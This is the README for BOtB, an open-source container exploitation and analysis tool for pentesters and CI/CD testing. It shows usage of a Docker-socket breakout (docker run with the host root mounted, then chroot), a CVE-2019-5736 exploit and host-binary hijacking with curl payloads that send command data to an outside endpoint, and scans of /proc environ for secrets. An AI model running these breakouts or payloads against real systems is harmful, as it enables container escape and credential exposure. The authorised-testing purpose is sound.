
A container analysis and exploitation tool for pentesters and engineers.

Primary LanguageGoGNU General Public License v3.0GPL-3.0

Break out the Box (BOtB)

BOtB is a container analysis and exploitation tool designed to be used by pentesters and engineers while also being CI/CD friendly with common CI/CD technologies.

What does it do?

BOtB is a CLI tool which allows you to:

  • Exploit common container vulnerabilties
  • Perform common container post exploitation actions
  • Provide capability when certain tools or binaries are not available in the Container
  • Use BOtB's capabilities with CI/CD technologies to test container deployments
  • Perform the above in either a manual or automated approach

Current Capabilities

  • Find and Identify UNIX Domain Sockets
  • Identify UNIX domain sockets which support HTTP
  • Find and identify the Docker Daemon on UNIX domain sockets or on an interface
  • Analyze and identify sensitive strings in ENV and process in the ProcFS i.e /Proc/{pid}/Environ
  • Identify metadata services endpoints i.e
  • Perform a container breakout via exposed Docker daemons
  • Perform a container breakout via CVE-2019-5736
  • Hijack host binaries with a custom payload
  • Perform actions in CI/CD mode and only return exit codes > 0

Getting BOtB

BOtB is available as a binary in the Releases Section.

Building BOtB

BOtB is written in GO and can be built using the standard GO tools. The following can be done to get you started:

Getting the Code:

go get github.com/brompwnie/botb
git clone git@github.com:brompwnie/botb.git

Building the Code:

govendor init
govendor add github.com/tv42/httpunix
govendor add github.com/kr/pty
go build -o botbsBinary


BOtB can be compiled into a binary for the targeted platform and supports the following usage

./bob_linux_amd64 -h
[+] Break Out The Box
Usage of ./bob_linux_amd64:
  -aggr string
        Attempt to exploit RuncPWN (default "nil")
        Attempt to autopwn exposed sockets
        Attempt to autopwn but don't drop to TTY,return exit code 1 if successful else 0
  -endpointlist string
        Provide a wordlist (default "nil")
        Attempt to find Dockerd
  -hijack string
        Attempt to hijack binaries on host (default "nil")
        Hunt for Available UNIX Domain Sockets with HTTP
        Display available network interfaces
        Attempt to find metadata services
  -path string
        Path to Start Scanning for UNIX Domain Sockets (default "/")
  -portscan string
        Attempt to portscan a host (default "nil")
        Perform Recon of the Container ENV
        Hunt for Available UNIX Domain Sockets
        Verbose output
  -wordlist string
        Provide a wordlist (default "nil")

The following usage examples will return a Exit Code > 0 by default when an anomaly is detected, this is depicted by "echo $?" which shows the exit code of the last executed command.

Find UNIX Domain Sockets

#./bob_linux_amd64 -socket=true
[+] Break Out The Box
[+] Hunting Down UNIX Domain Sockets from: /
[!] Valid Socket: /var/meh
[+] Finished

#echo $?

Find a Docker Daemon

#./bob_linux_amd64 -findDockerD=true
[+] Break Out The Box
[+] Looking for Dockerd
[!] Dockerd DOCKER_HOST found: tcp://
[+] Hunting Docker Socks
[!] Valid Docker Socket: /var/meh
[+] Finished

#echo $?

Break out from Container via Exposed Docker Daemon

This approach will breakout into an interactive TTY on the host.

#./bob_linux_amd64 -autopwn=true    
[+] Break Out The Box
[+] Attempting to autopwn
[+] Hunting Docker Socks
[+] Attempting to autopwn:  /var/meh
[+] Attempting to escape to host...
[+] Attempting in TTY Mode
./docker/docker -H unix:///var/meh run -t -i -v /:/host alpine:latest /bin/sh
chroot /host && clear
echo 'You are now on the underlying host'
You are now on the underlying host
/ # 

Break out of a Container but in a CI/CD Friendly way

This approach does not escape into a TTY on the host but instead returns an Exit Code > 0 to indicate a successful container breakout.

#./bob_linux_amd64 -autopwn=true -cicd=true
[+] Break Out The Box
[+] Attempting to autopwn
[+] Hunting Docker Socks
[+] Attempting to autopwn:  /var/meh
[+] Attempting to escape to host...
[!] Successfully escaped container
[+] Finished

#echo $?

Exploit CVE-2019-5736 with a Custom Payload

Please note that for this exploit to work, a process has to be executed in the target container in this scenario.

#./bob_linux_amd64 -aggr='curl "https://some.endpoint.com?command=$0&param1=$1&param2=$2">/dev/null 2>&1'
[+] Attempting to exploit CVE-2019-5736 with command:  curl "https://bobendpoint.herokuapp.com/canary/bobby?command=$0&param1=$
1&param2=$2">/dev/null 2>&1
[+] This process will exit IF an EXECVE is called in the Container or if the Container is manually stopped
[+] Finished

Hijack Commands/Binaries on a Host with a Custom Payload

Please note that this can be used to test if external entities are executing commands within the container. Examples are Docker Exec and Kubetcl CP.

#./bob_linux_amd64 -hijack='curl "https://bobendpoint.herokuapp.com/canary/bobby?command=$0&param1=$
1&param2=$2">/dev/null 2>&1'
[+] Break Out The Box
[+] Attempting to hijack binaries
[*] Command to be used:  curl "https://bobendpoint.herokuapp.com/canary/bobby?command=$0&param1=$1&param2=$2">/dev/null 2>&1
[+] Currently hijacking:  /bin
[+] Currently hijacking:  /sbin
[+] Currently hijacking:  /usr/bin
[+] Finished

Analyze ENV and ProcFS Environ for Sensitive Strings

By default BOtB will search for the two terms "secret" and "password".

 ./bob_linux_amd64 -recon=true
[+] Break Out The Box
[+] Performing Container Recon
[+] Searching /proc/* for data
[!] Sensitive keyword found in: /proc/1/environ -> 'PATH=/go/bin:/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binHOSTNAME=0e51200113eaTERM=xtermGOLANG_VERSION=1.12.4GOPATH=/gofoo=secretpasswordHOME=/root'
[!] Sensitive keyword found in: /proc/12/environ -> 'GOLANG_VERSION=1.12.4HOSTNAME=0e51200113eaGOPATH=/goPWD=/app/binHOME=/rootfoo=secretpasswordTERM=xtermSHLVL=1PATH=/go/bin:/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin_=./bob_linux_amd64OLDPWD=/bin'
[!] Sensitive keyword found in: /proc/self/environ -> 'HOSTNAME=0e51200113eaSHLVL=1HOME=/rootfoo=secretpasswordOLDPWD=/bin_=./bob_linux_amd64TERM=xtermPATH=/go/bin:/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binGOPATH=/goPWD=/app/binGOLANG_VERSION=1.12.4'
[!] Sensitive keyword found in: /proc/thread-self/environ -> 'HOSTNAME=0e51200113eaSHLVL=1HOME=/rootfoo=secretpasswordOLDPWD=/bin_=./bob_linux_amd64TERM=xtermPATH=/go/bin:/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binGOPATH=/goPWD=/app/binGOLANG_VERSION=1.12.4'
[+] Checking ENV Variables for secrets
[!] Sensitive Keyword found in ENV:  foo=secretpassword
[+] Finished

#echo $?

A wordlist can be supplied to BOtB to scan for particular keywords.

#cat wordlist.txt 

# ./bob_linux_amd64 -recon=true -wordlist=wordlist.txt
[+] Break Out The Box
[+] Performing Container Recon
[+] Searching /proc/* for data
[*] Loading entries from: wordlist.txt
[+] Checking ENV Variables for secrets
[*] Loading entries from: wordlist.txt
[+] Finished

# echo $?

Scan for Metadata Endpoints

BOtB by default scans for two Metadata endpoints.

#  ./bob_linux_amd64 -metadata=true                    
[+] Break Out The Box
[*] Attempting to query metadata endpoint: ''
[*] Attempting to query metadata endpoint: 'http://kubernetes.default.svc/'
[+] Finished

# echo $?

BOtB can also be supplied with a list of endpoints to scan for.

#  cat endpoints.txt 

#  ./bob_linux_amd64 -metadata=true -endpointlist=endpoints.txt
[+] Break Out The Box
[*] Loading entries from: endpoints.txt
[*] Attempting to query metadata endpoint: 'https://heroku.com'
[!] Reponse from 'https://heroku.com' -> 200
[+] Finished

# echo $?

Get Interfaces and IP's

#  ./bob_linux_amd64 -interfaces=true
[+] Break Out The Box
[+] Attempting to get local network interfaces
[*] Got Interface: lo
        [*] Got address:
[*] Got Interface: tunl0
[*] Got Interface: ip6tnl0
[*] Got Interface: eth0
        [*] Got address:
[+] Finished

Using BOtB with CI\CD

BOtB can be used with CI\CD technologies that make use of exit codes to determine if tests have passed or failed. Below is a Shell script that executes two BOtB tests and the exit codes of the two tests are used to set the exit of the Shell script. If any of the two tests return an Exit Code >0, the test executing the shell script will fail.



echo "[+] Testing UNIX Sockets"
./bob_linux_amd64 -autopwn -cicd=true

echo "[+] Testing Env"
./bob_linux_amd64 -recon=true

(exit $exitCode)

The above script is not the only way to use BOtB with CI\CD technologies but could also be used by itself and not wrapped in a shell script. An example YML config would be:

version: 2
  runATest: ./bob_linux_amd64 -autopwn -cicd=true

Below is an example config that can be used with Heroku CI:

    "environments": {
        "test": {
            "scripts": {
                "test": "./bob_linux_amd64 -autopwn -cicd=true"

Below is an example config with Heroku CI but using a wrapper shell script:

    "environments": {
        "test": {
            "scripts": {
                "test": "./bin/testSocksAndEnv.sh"

Issues, Bugs and Improvements

For any bugs, please submit an issue. There is a long list of improvements but please submit an Issue if there is something you want to see added to BOtB.

References and Resources

This tool would not be possible without the contribution of others in the community, below is a list of resources that have helped me.

Talks and Events

BOtB is scheduled to be presented at the following:


BOtB is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License (http://creativecommons.org/licenses/by-nc-sa/4.0).